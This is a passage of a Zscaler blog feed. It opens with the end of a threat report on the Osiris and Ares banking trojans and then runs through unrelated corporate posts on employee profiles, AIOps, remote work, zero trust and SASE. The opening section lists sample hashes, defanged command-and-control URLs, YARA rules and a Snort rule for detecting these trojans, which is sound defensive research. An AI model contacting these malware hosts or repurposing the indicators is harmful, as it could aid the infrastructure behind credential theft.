BMPack, Ares, and Ares Stealer. Therefore, activity related to this threat is likely to increase as the malware continues to mature. Detections Zscaler’s multilayered cloud security platform detects indicators at various levels, as shown below: Win32.Banker.Kronos Win32.Banker.Kronos.LZ MITRE ATT&CK Table Tactic Technique T0011 Command and Control T1053 Scheduled Task/Job T1078 Valid Accounts T1087 Account Discovery T1090 Proxy T1185 Man in the Browser T1219 Remote Access Software T1497 Virtualization/Sandbox Evasion T1552 Unsecured Credentials T1573 Encrypted Channel T1592 Gather Victim Host Information Indicators of Compromise (IOCs) The following IOCs can be used to detect Osiris and Ares infections. Samples SHA256 Hash Module Name da767e6faf97d73997f397eae71b372a549dd6331bf8ec0ebd398ef8cfe9a47e Osiris sample 5e7642e945bd05ecea77921cb3464b6da8db59e5ff38240608e3cbb44b07fb1d Osiris sample 7498e37c332d55c14247ae4b675e726336a8683900d8fd1da412905567d2de4a Ares sample e5d624b7060c0e885abe11a0973a43a355c9930fc6912ff5eac83d1a9eec9c29 Ares sample 035793d479c4229693fc6dcceaa639cd51ae89334b43e552b9c47a6dea68ce30 Ares sample with embedded Startup module 94b084ea925990742f4eaaada1eef9a42c13066bf4f4c7a3b12a1509e32ff9e6 Ares Stealer sample 09897c6ef88b9e9bc20917a2b47ec86ff2b727a2923678f5e2df6bb6437d3312 Ares VNC plugin 896cebf465257f60347e58ffd7ec61629cf530956ef9b00e94f8b40ef9b30581 DarkCrypter with second-stage BMPack and Osiris sample 956ae36f40d0d847daa00d7964906e7e9d1671d0f3f2e7d257d5a8d324388c31 DarkCrypter sample with encrypted Ares payload 6c5dac9043b2f112543f3eca6503d4bcc70d762b47d75dcb85f9767c603de56f DarkCrypter sample with compressed Ares TOR payload b3348405cd0fa66661b46bc6cbab97b55708be26a2ed7a745e1632b46d1b3f41 DarkCrypter sample with encrypted Ares payload 4044abad9a846e203f131c65b1f84bb2b79f94000d1d7be6c6d6a8e27ac76940 BMPack sample with Osiris payload Network Indicators Domain / IP Address Description http://ylnfkeznzg7o4xjf[.]onion/kpanel/connect.php Osiris C2 URL http://m3r7ifpzkdix4rf5[.]onion/kpanel/connect.php Osiris C2 URL http://qqkzfkax24p4elax[.]onion/kpanel/connect.php Osiris C2 URL https://securebankingapp[.]com Osiris web inject domain http://vbyrduc537l5po3w[.]onion/panel/connect.php Ares C2 URL http://wifoweijijfoiwjweoi[.]xyz/panel/connect.php Ares C2 URL http://ddkiiqefmiir[.]xyz/panel/connect.php Ares C2 URL http://ddkiilefmjim[.]xyz/panel/connect.php Ares C2 URL http://ddkiieeelkif[.]xyz/panel/connect.php Ares C2 URL http://ddkiiofelkkq[.]xyz/panel/connect.php Ares C2 URL http://ddkiihfelikh[.]xyz/panel/connect.php Ares C2 URL http://ddkiiffdkijh[.]xyz/panel/connect.php Ares C2 URL http://ddkiigedliji[.]xyz/panel/connect.php Ares C2 URL http://ddkiirfdmjks[.]xyz/panel/connect.php Ares C2 URL http://ddkiitefkkju[.]xyz/panel/connect.php Ares C2 URL http://mydynamite.dynv6[.]net/panel/connect.php Ares C2 URL http://cabletv[.]top/panel/connect.php Ares C2 URL Yara rules These rules are valid on unpacked Kronos, Osiris, and Ares binaries. rule kronos_string_decryption { strings: $ = {6a 1e 5f f7 f7 8b 45 08 8d 3c 1e 8a 04 38 8a ?? ?? ?? ?? ?? 32 c2} $ = {55 8b ec 51 8b 4d 08 c1 e1 04 8b ?? ?? ?? ?? ?? 8a} condition: all of them } rule kronos_api_strings { strings: $ = "D7T1H5F0F5A4C6S3" $ = "H2G3F4F0F5A4D5E6" $ = "X1U5U8H8F5A4C8C5" $ = "E3D7R6B3R4H5F3R7" $ = "X8D3U3P7S6Q3S5R1" $ = "X8D3T6Q6U3S3A6R1" $ = "R6G2D2R3A5E3C4U5" $ = "H7Y6G2R3A5F4D3S8" $ = "P7Y3Q5P0Y8C2Y6F6" $ = "R6Y7B3C6E7E6T7U7" $ = "G2F3G6A6R3F1P6G2" $ = "S3H8T8Y5F5B5B0X0" $ = "C8G2T3U3B1H3T5B5" $ = "C4R7A2P4X3B1H5A4" $ = "R3Q7T7Q2R6S1Y3R5" $ = "E3C3A2Y3C4U6S5F5" $ = "F3P7Y6P3U3E2U5F3" $ = "E5X0A4Q4F0Y0D6E2" $ = "X2R0A4Q4F0Y0D6F3" $ = "H1G7R4Y7D1E6R5F8" $ = "G3C3R4H7R5T8E5R8" $ = "F6H5P7T4F6D6Y6D4" $ = "E3C7U2Y3C3R6R5D5" $ = "F5E8X5G3Q6T7E6T3" $ = "E1U3D5F7R2Y5S0H4" $ = "H3Y5C8Y2D4U8Y4S3" $ = "U0U6H1T2F6S1P2Y5" $ = "D5R3T8D5D3H0B4E2" $ = "D5B6G6R4A6H1P7A3" $ = "F1Q3D0H4H3T6U1X5" $ = "A4T6P1G7D6G0F3S5" $ = "C7G5T6P7U5B1H0F5" $ = "X2C7E3U6F3A7Y1D5" $ = "P4Y7T7R7R8X3E3A3" $ = "C5Y7R2R2H1R7A1B2" $ = "S4A3E3S3S4T1T3D1" $ = "B4Y2H7F8A2T3G4H3" $ = "B5D6X4H5G6S3R2B5" $ = "B6F6X4A8R5D3A7C6" $ = "C6P7E6P7A1R5Q4R7" $ = "R8S7D7S8H6Y4T6B7" $ = "U0S3T3D3U5F5B4E8" $ = "F6C3U4P4X3B1H3T5" $ = "T2F2T3U2H5B1C1A7" $ = "T0E0H4U0X3A3D4D8" $ = "C5R4X4H7R5T7A5R6" $ = "D3S0A7R4F6C8F2R5" $ = "Y1C1B6A7H3C0E7E7" $ = "H2E7A5B8Q6G3S7Y3" $ = "D3Q5F2F3R5Y5Y8S2" $ = "Y2C3G8R5R3A5F5B4" $ = "F1D2B6A5T3X2C8R1" $ = "G5D3P2G0F6G2H8E6" $ = "Y6Q6P2G0E5E6G2H8" $ = "Y7D3F3S7X2S4F2X3" $ = "X7D0E3R2R4Q0E4D3" condition: 25 of them } Snort rules alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN Ares Command Beacon"; flow:established,to_server; content:"POST"; http_method; content:"/connect.php?a="; http_uri; classtype:trojan-activity; rev:1;) Tue, 30 Mar 2021 11:09:11 -0700 Brett Stone-Gross Celebrating Women at Zscaler: Melissa Balentine on Professional Growth and the Evolution of Zscaler In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Melissa Balentine, Senior Vice President, Finance has been with Zscaler for more than five years. In that time, she’s seen Zscaler grow and go IPO and has honed her professional skills to make a difference and find fulfillment within the company. Q: What are you most proud of in your career? A: Going through the IPO process at Zscaler, and the ultimate public offering, was one of the most important projects in my career. Having built internal reporting to support being a public company, I got the opportunity to see firsthand how this information is shared and used by the outside analysts who would eventually value Zscaler. Having all of this preparation leading up to the day we listed the stock, and to be in NYC for the big event, was exhilarating. Q: What is one of the most valuable skills that helped you get to the role you have today? A: Executive presence. As I’ve grown in my career, the ability to project confidence through effective communication and presentation skills has become more critical. I work to “read the room” when I host meetings to be sure my message is understood. Additionally, one of the most valuable skills I have honed is complex financial modeling. I spend time researching modeling inputs and understanding their relative impact on the financial results of the company. The models I build can be very large and cumbersome. What I’ve learned is building the model is only half of the work; the other half is taking the result and simplifying the message to be easily understood and explained. It isn’t necessary to show all of the steps and analysis, but instead to draw clear, concise conclusions allowing executives to digest and act. This step takes as much effort as building the model itself and is equally important. With this skill, I have the tools to not only prove out certain trends and theories through financial modeling, but also the ability to enable key decision making based on the modeling results. Q: What do you like to do outside of work? A: I like to unwind by working out, from my early morning workouts on my Stairmaster to local hikes on weekends. I also enjoy reading–mostly historical fiction. Since the shelter-in-place orders, I have enjoyed watching home renovation shows. For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik Tue, 16 Mar 2021 08:00:02 -0700 Kristi Myllenbeck Zscaler AIOps: Drawing the Signal Out of the Noise in the Largest Security Cloud This post also appeared on LinkedIn. The Zscaler Zero Trust Exchange, the cloud platform that power all Zscaler services, secures more than 150 billion transactions per day, protecting thousands of customers from cyberattacks and data loss. The Zscaler platforn is the world's largest inline security cloud, and the sheer volume of data it processes is astronomical to comprehend: Every second, another 1.6M transactions move securely through the platform. And in that one second, it blocks up to two thousand new threats. The Zscaler Zero Trust Exchange produces mountains of data. For a relative sense of that scale, here are some comparable stats from other cloud platforms: Figure 1. Comparing Zscaler data traffic to other cloud platforms. Each dot represents 100 million data points. (Sources: Facebook, Google, Zscaler.) Finding meaning in all of that data is the shared responsibility of Zscaler’s engineering, research, and machine learning (ML) teams. I have the privilege to lead the ML group: We're tasked with staying ahead of advanced threats, and identifying and blocking threats before they become measurable risks. We comb through the mountains of Zscaler cloud data to identify threat patterns and block those advanced (and often previously unknown) advanced threats without signatures or human interaction. The ML team’s work extends beyond protecting Zscaler customers' data traffic. The ML group collaborates with Zscaler big data, cloud reliability, TAM, and support teams to explore how to make the worldwide cloud operations smoother, using ML to craft actionable operational strategies based on our own operational data. We work closely with Zscaler's operations and reliability teams: They employ a diverse set of tools and automation processes to maintain and monitor the Zscaler Zero Trust Exchange's highly scalable cloud infrastructure. Monitoring such a massively large-scale cloud isn't a trivial exercise without challenges. For example, the Zscaler cloud infrastructure must interact with some external networks. Often, performance or reliability issues—say, those related to an ISP problem—occur before data reaches the Zscaler cloud. And there's also the challenge of interpreting a massive volume of metrics: AIOps can help find higher-level patterns. As part of our ongoing analysis, the ML team examines numerous metrics, including (but not limited to) volume, latency, traffic destination/direction. We leverage multiple ML models to find meaning in the performance data. Anomaly detection for each metric can give us a single "dot” of alert, an individual data point that itself can be "noisy" and unclear. But the more anomaly-detection dots from other metrics we collect, the more vivid the picture we can illustrate: Our AI models correlate and (literally) connect the dots to draw the signal out of the noise. We recently introduced new AIOps ML models and quickly discovered how effective they could be when put into practice. In January, a Zscaler customer's tunnels "flipped" at one of our data centers in Hong Kong. There was no impact on customer performance since that customer had followed Zscaler configuration best practices and established redundant tunnels. But the problem could have reflected a more significant issue. Figure 2. ZTE “flow” flipping analysis. Figure 2 above shows the number of companies with flipping “flows.” The “flow” is a conceptual concept: Like a tunnel, but more granular than the standard GRE/IPsec tunnel. Picking up that spike is not as simple as it might look on the surface: assessing the flow requires interpreting a massive amount of data. Where do we draw the line to set a threshold alert? The top 1 spike? Top 10? Top 20? How should we balance the high detection rate vs. high accuracy? And how do we establish a threshold for a specific data center? Are there other metrics we should leverage together? Answering these questions requires statistical and ML baselining and modeling. Anyway, our AIOps ML testing model instantly picked up the real-world alert, enabling us to isolate and address the problem immediately. The real problem we saw in the Hong Kong data center was occurring upstream of Zscaler, and was resolved after communication with the "mid-stream" ISP. Even without the AIOps model, Zscaler operations folks have discovered the problem, but the name of the game is the turnaround. Had our model been officially live at the time, we would have discovered (and then resolved) the issue even faster. In this example, we were able to identify then resolve a problem at a customer's ISP before it impacted performance. We did it by finding a signal in the massive amount of data/metrics the Zscaler Ops team produces and by leveraging the domain expertise we have within the company. Here at Zscaler, we are only just beginning our journey to apply AI and ML to impact customer cloud transformations. The future of AIOps—especially at Zscaler— is exciting and enables us to serve customers better and faster. Mon, 15 Mar 2021 10:26:56 -0700 Howie Xu Key Takeaways From a Year of Remote Work It's a Monday morning in January. Heavy snowstorms move across Germany leading to traffic chaos on the roads and in the air. My first thought when I opened my eyes was, “nice, you don’t have to race to the airport, potentially get into a traffic jam on icy roads, rush through security to reach a flight in order to attend a business meeting in Hamburg, London, or Prague, only to find that the flight was cancelled due to the weather conditions.” Since mid-March 2020, our everyday working routine has changed considerably. Negativity aside, many of us simply have a different day-to-day now. Today, not only can I sleep a bit longer, but I can also start my day with my new routine of doing sports, getting a healthy breakfast and my favourite coffee from my own espresso machine, while still arriving on time at my laptop for my first meeting, without having travelled a single mile (except for walking from the kitchen into my home office). This is what I consider to be a luxury in my new normal way of working. Working for Zscaler enables me to work totally remotely, in line with the required contact regulations of the pandemic, and still be productive. Due to the time I don’t have to invest to reach customer headquarters, I’m even able to facilitate more remote meetings per day than I would have been able to via in-person meetings. Moreover: working remotely was always part of my employee contract, as I am enabled technically via Zscaler to work from wherever I want to. Nevertheless, a huge percentage of my working life was filled with meetings across European cities and sleeping in hotel rooms to be on time for early morning workshops on infrastructure and security requirements for the future way of working. Before COVID-19 hit, I was travelling at least four out of five workdays to attend in-person meetings with customers and prospects to consult them on their digital transformation strategy. Miles were piling up on my Lufthansa frequent flyer card and my car’s tachometer, not to mention the heavy use of my Bahncard. Looking back at the first year of working constantly from home, I’ve come up with a positive balance in many areas. Before the lockdown, approximately 284 days of the year would have started with a stressful early morning routine. Working from home saved me about 24,750 kilometres on motorways and 195,000 air miles. I even had the time to dive deeper into this calculation: the amount of carbon dioxide that this workload of travelling would have created is equal to the production of 41.58 tons ...just produced by me, myself, and I. The last year was record-breaking in many ways, but I want to take a moment to emphasize these staggering environmental statistics. My normal working habits in my role on the road is causing an average of 41t of CO2 per year. Just as a reference, a normal German habitant should produce something around 7.9 tons. Besides the stress and amount of money that travelling eats up, I was astonished by this high number. Every single kilometre with my car produces 102g of CO2, and each air mile by plane produces 200g. Of course, it would be possible to optimize the number, for example by replacing my diesel with an electric car (which would require 62g per km instead which would be a marginal gain already) or I could try to reach my targets more often by taking the train and calculate with longer travel times instead. All in all, my personal carbon footprint would still be high. The real change was forced on me by the pandemic with the consequence of exchanging face-to-face meetings through online interactions with colleagues, partners, prospects, and customers. Having a look at my individual contribution to air pollution, I can only underline efforts of various green organisations to more regularly avoid travelling for the sake of working from home. Greenpeace has requested to have a certain amount of work-from-home days each week. The organisation has found that at least one third of the German workforce (25 - 37%) has been working from home since the first phase of the German lockdown in mid-April 2020. The Work from Anywhere Trends Dashboard from Zscaler replicates these findings - the amount of remote user traffic has risen steadily since the first lockdown, showcasing that companies have adopted the new working from anywhere paradigm slowly. For reference, making a permanent habit of working remotely one or two days per week would save up to 5.4 million tonnes of CO2 in Germany. Personally, I’m of the strong belief that the possibility of being able to work from home is one of the positive side effects of the dark times resulting from the global health crisis. However, I’m coming across a lot of different opinions, and offices are still full of employees (not only in industries where remote working is not feasible). I was curious to understand the reasons for these different habits of continuing to work from corporate offices. Outside of technological reasons, like missing infrastructure to enable efficient and secure remote access, other factors prevent people from working from home. Not being able to structure a working day while working from home is just one of the arguments I’ve heard let alone families who have to share limited space in a household with kids and try to juggle between facilitating a job and monitoring homeschooling efforts while also keeping children happy and motivated. Not seldomly, it was the employer that demanded to work from office spaces as there still seems to be a certain reluctance to trust the productivity of remote workers. Experience proves these sceptics to be wrong, as best practise examples of Zscaler customers show (Working from Home: Greater Efficiency brings productivity). Given the right technology infrastructure for fast and reliable remote access, staff is as productive working from home, if not more productive, as some of the typical office distractors are being reduced. Some early adopters have embraced the work from anywhere mentality full-heartedly and don’t regret it. My daily online conferences show the differences, reflecting which companies have adapted fast and are able to enable their workforce to keep the business productivity going. My personal takeaways from this “new normal” are that you have to adapt to get the most out of your daily online meetings. Virtual interactions require as much preparation time, if not more, to live up to all expectations of a group of meeting participants. You can’t have a face-to-face chat during a coffee break or at the bar in the evening to make sure that you have brought your point across. You need to follow up with more phone conversations or meetings and need to invest more time to accomplish a mutual understanding for a project’s success. I also have found out that it is super important to stay motivated about little successes, as we all miss the bigger events to look forward to, like our next big adventure in a foreign country. The last year has shown that this way of doing business is feasible. I, for one, have grown to be an expert timekeeper and learned how to differentiate between working hours and leisure time, and I don’t want to miss my newly-won freedom that I don’t have to spend travelling. Even if it might still take some time to convince all remaining sceptics, the year of lockdown has catapulted many organisations into the future way of working today. We have grown accustomed to video conferencing and will have to keep the habit of making an educated decision, when a personal contact is the preferred option for a meeting, once contact restrictions will be loosened. So the question has to be: what did we learn in the last year, that is here to stay? I personally have made up my mind already. I’ll have a closer look at my carbon footprint moving forward. The environment will profit from it. Mon, 15 Mar 2021 01:00:02 -0700 Kevin Schwarz Bringing Zero Trust Into Focus In the latest of the seemingly endless string of IoT security incidents, Verkada—a video security startup that boasts its real-time, accessible-from-anywhere management console—was recently breached. This incident exposed live and saved video feeds from over 149,000 security cameras in use within office buildings, schools, and consumers’ homes, counting larger businesses such as Tesla and Cloudflare among the victims. In this breach, an administrator’s password was published to the internet, allowing hackers to log in with privileged access to the full platform and customer files. The ThreatLabZ research team regularly monitors IoT threats among the 150+ billion Zscaler platform transactions that occur daily, and listed IP and network cameras among the top unauthorized devices in use on corporate networks in its 2020 IoT Devices in the Enterprise report. Typically, the threat posed by IoT cameras is that the devices themselves are easy to hack, providing attackers access to corporate networks as employees check their nanny cams from work or engage in similar activities. These types of exploits pop up regularly, such as the RIFT botnet, which looks for vulnerabilities in network cameras, IP cameras, DVRs, and home routers. This latest breach, however, represents a different type of security concern that is not exclusive to IoT devices (and certainly not exclusive to Verkada): vendors in your environment who may be storing data with inadequate protections. As a security practitioner, you must be aware of the security protocols in place for all of the sensitive data in your ecosystem, whether you manage it yourself or a vendor manages it on your behalf. Failing to do so is like having someone in your pandemic bubble whose behaviors you have no visibility into: you hope they aren’t going to raves every weekend, but you have no way to really know whether you’re safe. There are a few takeaways we can learn from incidents like the Verkada breach: Get serious about zero trust. First, it should not be easy for “super admins” to access all of your sensitive data—especially customer data—and if such access is required, it must be locked down behind several layers of authentication. A foundational principle of zero trust policy is the requirement that you restrict access to the minimum required to get a job done, with heavy monitoring and authentication all along the way. Access policy gatekeeps every transaction in the Zero Trust Exchange, the platform that powers all Zscaler services. Segment your applications—and get your data off the internet. The back-end of your systems should never be exposed to the internet for a hacker to be able to even attempt to log into them. Putting your servers behind a proxy means that hackers can’t see that the server even exists, and all authorized access requires layers of authentication in full visibility of your security teams and their analytics tools. Additionally, by segmenting applications, you limit the damage threat actors can cause in the event that they successfully breach one application—they can go no further. Manage your cloud security posture. The cloud applications and data storage locations you and your partners are using must be configured correctly. Making sure that they are is easy with the right tools: use cloud security posture management (CSPM) to scan your environments for misconfigurations, compliance violations, and other issues that make you vulnerable. Every breach story is another reason to take steps forward in your journey to comprehensive zero trust. To learn more about IoT security trends and best practices, check out the ThreatLabZ report, 2020 IoT in the Enterprise: Shadow IoT Emerges. Fri, 12 Mar 2021 10:48:50 -0800 Mark Brozek The Growing Importance of Multicloud Networking For many organizations, cloud migration has resulted in an unprecedented transformation in computing, dramatically improving agility, automation, scalability, and performance. Unfortunately, the same can’t be said of connectivity. Cloud connectivity is largely based on decades-old technologies that have only incrementally improved over time, saddling enterprises with static, complex solutions for connecting their completely modernized compute infrastructure. Why is this the case? Traditional networking vendors, who have been outfitting data center connectivity for years, are plagued by their own success and inertia. When you have a cash cow product line that has worked for years, it’s amazingly difficult to scrap it and start with a blank slate based on updated market requirements. The cloud service providers would be the next logical step, but even they have their own business-driven rationale for not closing this gap. Why would they build simple, secure connectivity solutions that encourage their customers to adopt a hybrid-cloud or multi-cloud approach when so much of their business model relies on single-cloud consolidation? Multicloud networking with legacy technologies As we’ve seen, even building secure internet access for cloud workloads can be a challenge. Stitching together secure connectivity across multiple clouds and your data centers means the challenge grows several fold, requiring a patchwork of site-to-site VPNs, firewalls, transit gateways, peering policies, and more. What’s worse is that since the configuration of all of these assets is based on network layer port and IP ACLs, the policies must constantly be updated based on the dynamic nature of cloud workloads. The impact? Either someone spends all day (every day) updating policies, or your developers need to wait for networking and security teams to get around to it. Neither of these is a palatable option! The whole process is complex, slow, and costly, and results in a situation where nobody is happy. The rise of modern multicloud networking Fortunately, as needs arise, the vendor community often responds with innovative new solutions. Zscaler is at the forefront of solving these multicloud networking challenges with workload communications via Zscaler Cloud Connector. Zscaler Cloud Connector simplifies and automates the process of securely connecting cloud and data center workloads to each other and to the internet. Built on Zscaler’s proven Zero Trust Exchange platform, the solution eliminates the cost, complexity, and hassle of connecting cloud workloads using legacy technologies. Zero-touch deployment and automated policy configuration through deep integration with native cloud services and automation tools means that Cloud Connector can be auto-deployed across multiple clouds in minutes. And because it’s built on zero trust, your attack surface is minimized, dramatically reducing the risk of a data breach. If any of the challenges in this post sound familiar, it’s time to take a look at workload communications made possible through Zscaler Cloud Connector. Reach out today to schedule a demo. Wed, 10 Mar 2021 13:42:24 -0800 Rich Campagna Celebrating Women at Zscaler: Diana Vikutan on Developing Zscaler and Honing Multitasking Skills During Quarantine In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Diana Vikutan, Director of Cloud Operations at Zscaler, manages a team of Program and Project Managers and was the first Program Manager at Zscaler when she joined six years ago. Diana and her team oversee platform and private infrastructure programs as well as cross-functional and internal CloudOps projects. “I’m so proud to be a part of Zscaler’s success and growth story and part of the great team that helped to move a promising private company to a global player and an industry leader in the cybersecurity space,” she said. Q: What advice do you have for women wanting to get into tech? A: Just do it! Make that first step, whether it’s getting a technical degree, completing that training course, or landing a first job, you have to make an initial effort no matter how small it seems at the time in order to see results in the future. Without trying, you would never know what you are capable of. If I could give my younger self any professional advice, it would be to not be afraid to take risks! Q: Who was your greatest inspiration when you were growing up and why? A: I’ve never considered a particular person as my inspiration. I’ve always preferred to set my own goals. At the end of the day, you can only be successful when you don’t compare yourself to others but compete with yourself instead. Q: Have you picked up a hobby during quarantine? A: During quarantine, I’ve definitely taken my multitasking skills to the next level as a working mother of a toddler! For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik Thu, 11 Mar 2021 08:00:01 -0800 Kristi Myllenbeck Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Karen Mayerik Karen Mayerik is a Sales Engineering Manager for customers that are in education and state and local governments. “If you love problem-solving, tech is an amazing place to be,” she said. “I get a lot of satisfaction from meeting with customers, understanding where they're having challenges, and being able to solve those problems for them. There's something that is really creative as part of that process.” Outside of work, Karen enjoys spending time with her husband and two daughters, ages 10 and 12. “We love to go to the lake as a family,” she said. “And we actually have a rule that when we're on the boat or around the campfire, we put all of our devices away, so it's always a nice break!” Sandi Lurie Sandi Lurie has been Vice President, Talent Acquisition at Zscaler since July 2020. “Our job is to attract and hire top talent into the company while maintaining an exceptionally high bar for candidate experience,” she said. “Watching the careers of people that I've worked with and hired in my past companies is extremely rewarding. Everything from leaving the talent acquisition career to go into HR business partner or operational roles, or seeing people that I hired into their first job now running talent teams at scaling companies themselves, I love seeing people succeed.” Outside of work, in non-quarantine times, Sandi loves to travel, attend live theater shows in New York, and spend time with friends and family. Within quarantine, however, she is mastering eyelashes and the art of banana bread baking. To learn more about the powerful women at Zscaler and how we’re celebrating throughout the month, read our International Women’s Day blog. Further reading: Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Wed, 10 Mar 2021 08:00:01 -0800 Kristi Myllenbeck How a Blizzard Froze the Network (and Prepared an IT Team for 2020) This post originally appeared on LinkedIn. A blizzard helped a fellow CISO understand a better way to do IT security and, in the process, prepared his organization for an even greater crisis a few years later. I was talking with one of my CISO peers about adapting to various crises—in particular, natural disasters—and he relayed the following story to me. Early in his CISO career, he deployed company-wide security. The plan was straightforward, or so he thought: Build a single, centralized security control architecture. All traffic—local, branch office, remote user—would get routed through the “castle-and-moat” design, examined and inspected, then sent where it needed to go. Centralized security controls promised a unified way for his security teams to keep threats at bay. It made sense strategically and financially: Replicating security at different locations would have multiplied the effort, the equipment, and the cost. Early success was a ray of sunshine His plan met with early success: his team’s security blocked a virulent malware attack and they all patted themselves on the back for a job well done. They had made the right decision! But his sunny, centralization journey was experiencing a calm before the storm. Their castle-and-moat security architecture routed all traffic from everywhere—including traffic bound for the internet—through their security stack. Security became a huge bottleneck. Users couldn’t access simple things like social media. Media applications such as YouTube slowed to a crawl. Important productivity applications became unusable. The user experience degraded below an acceptable threshold, and people found new ways to use apps and services—ways that bypassed centralized security. The more protection the team put in place, the more latency was introduced, and the more people started using other channels to get online: Home networks, mobile connections, or public Wi-Fi. Employees avoided security using unsecured links and unapproved proxies. Now the company’s network was less secure, and its highly prized (and highly expensive) security system was failing under the weight of the side effects caused by its intended use. As a response, my CISO colleague was forced to do what he had tried to avoid: His security teams created three new data centers and cloned “centralized” security in each. In theory, this allowed people to get better performance by providing localized access, splitting one big, bottlenecked traffic load into three smaller distributed loads. It also tripled the cost, management, and complexity of their security footprint, but they could justify it with the hope of improved user experience. Even with these new breakouts, the users still avoided security controls. Employees were used to accessing applications and services however they liked and were understandably reluctant to go back to indirect security routing. Locked in at home, locked out of the network That point got hammered home a few winters ago. During and after the blizzard, no employees could come into the office. Everybody was out of the “castle” and outside the perimeter protection of the company’s security “moat.” They had VPN access available, but as people jumped on VPNs and their traffic competed for limited bandwidth, app performance slowed to a crawl. Everybody stuck working from home defaulted to the path of least resistance to get things done: Home broadband, Wi-Fi, and mobile connections. His security teams lost all control of any corporate devices not using their network. They couldn’t see anything employees were doing, or the status of device health, until users reconnected to the corporate network. Once those devices rejoined the network, the security teams could see and stop malicious traffic. But the damage was already done: There was a huge increase in malicious traffic once devices reconnected. The blizzard buried my friend’s security teams in threats. Through this experience, the team realized important truths about the changing workforce and began to realign their security strategy to be more flexible and resilient and to focus on user experience as a key component of security and access control. Here’s why: Users have a low tolerance for delay. Any security that is difficult, inconvenient, or prevents access WILL be ignored or bypassed. Centralized security is difficult (and expensive) to scale and can be inflexible to accommodate new circumstances. This is especially true now that enterprises are consuming more and more space in clouds and using “X”-as-a-Service (XaaS) to bolster infrastructure and increase productivity. Security must be inline between the user and the application. Users default to whatever gets them access to what they need, immediately. Enterprise security must support this behavior. The team turned to SASE, which prepared them for 2020 My friend’s team realized that even though blizzards don’t occur every day, the workforce was changing, with more and more people working remotely. At the same time, the company was using as many cloud-delivered applications and services and they had in the data center. The castle-and-moat security model would not effectively secure employees connecting from home and on the road and would create a poor experience for those connecting to cloud apps. They turned to SASE. The secure access service edge (SASE) solution is a better alternative to a centralized security model. Cloud-based SASE positions security inline, securing every connection between users and applications, no matter where they (the users or the applications) sit. SASE security services are distributed across the cloud, near each user: Users can go directly to the internet to access applications, infrastructure, or data. This negates the need for backhauling all traffic through a central security stack and removes bottlenecks to SaaS applications like and Microsoft 365. Because the team learned from its experiences during and after the blizzard and adopted a SASE model, it was able to pivot quickly to a fully at-home workforce in the wake of the COVID crisis. While many organizations had to make do in the early days with overloaded VPN infrastructures and inadequate security, my friend’s organization was ready, thanks to SASE, and able to keep employees safe and productive, while maintaining security. SASE is the future of security A SASE cloud security platform is built to accommodate digital transformation and the modern enterprise is an excellent way to ensure application and network performance and scalability. It allows users to directly access applications and services in the cloud without routing traffic through centralized security stacks that become bottlenecks for user experience. With a globally distributed platform, users are always only a short hop to their applications. During unexpected crises of any size or duration, businesses need to be able to continue operations with minimal disruption. In this hyper-connected world in which the majority of business communications and activity is conducted over the internet, the answer is SASE. Tue, 09 Mar 2021 12:20:43 -0800 Nathan Howe Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential and powerful women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Jey Govindan, Director of Service Operations and Enablement, joined Zscaler in July 2020. Her role is focused on enablement, onboarding, and implementing tools and processes to help her team succeed. We spoke with Jey to get some insight into her career, what gives her fulfillment, and how she plans to inspire future generations of women in tech. “I’m really proud of my career,” she said. “First of all, I want to thank the great leadership that we have here at Zscaler and also the leadership that I’ve worked with in my previous companies. That trust and confidence that they had in me gave me an opportunity to think out of the box and come up with innovative solutions—whether it is setting up teams, creating hiring strategies, or implementing tools and automation—that really helped me deliver results that made our customers happy.” Q: What advice do you have for women wanting to get into tech? A: Don't fear technology. Getting into tech is the same as getting into any space. We all have to develop our skills to be the best, regardless of the field. As long as we commit to working hard and giving it our best, there is nothing to fear—go for it! My advice to women is to not succumb to labeling and stereotyping—all that we need to do is self-analyze and understand from our deep, calm, inner self what we want to do, and stick to it. Q: What professional advice would you give your younger self? A: Have long-term goals. I planned my career, for the most part, in the technology industry and how I wanted to work within it, with goals to contribute to the leaders of that space. These were three- to five-year plans. If I were to advise my younger self, I would say to career plan ten years, or even 15 years, into the future and dream the full journey a bit more. Q: Who was your greatest inspiration when you were growing up and why? A: My dad has been my inspiration from day one, and he still is. He was a true multi-talented gentleman and we were very close. He was an elite sportsman, engineer, and math wizard. He worked hard and was always very kind and humble. For me, there is so much that I continue to learn from him. Q: Based on this year’s IWD theme, “Choose to Challenge,” how will you plan to celebrate women’s achievements and forge a path for future rockstar women in tech? A: I love this year's International Women’s Day theme! We all need to commit to ourselves to "Choose to Challenge." I am who I am because I chose to challenge in the past. With growing awareness, I am 100 percent sure that in a matter of years we won't have to fight it so much! Q: Is there anything you’d like to add about your career journey or women in tech? A: I am here as a sounding board, a mentor, or just simply to share my experience with young women. For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik Tue, 09 Mar 2021 08:00:01 -0800 Kristi Myllenbeck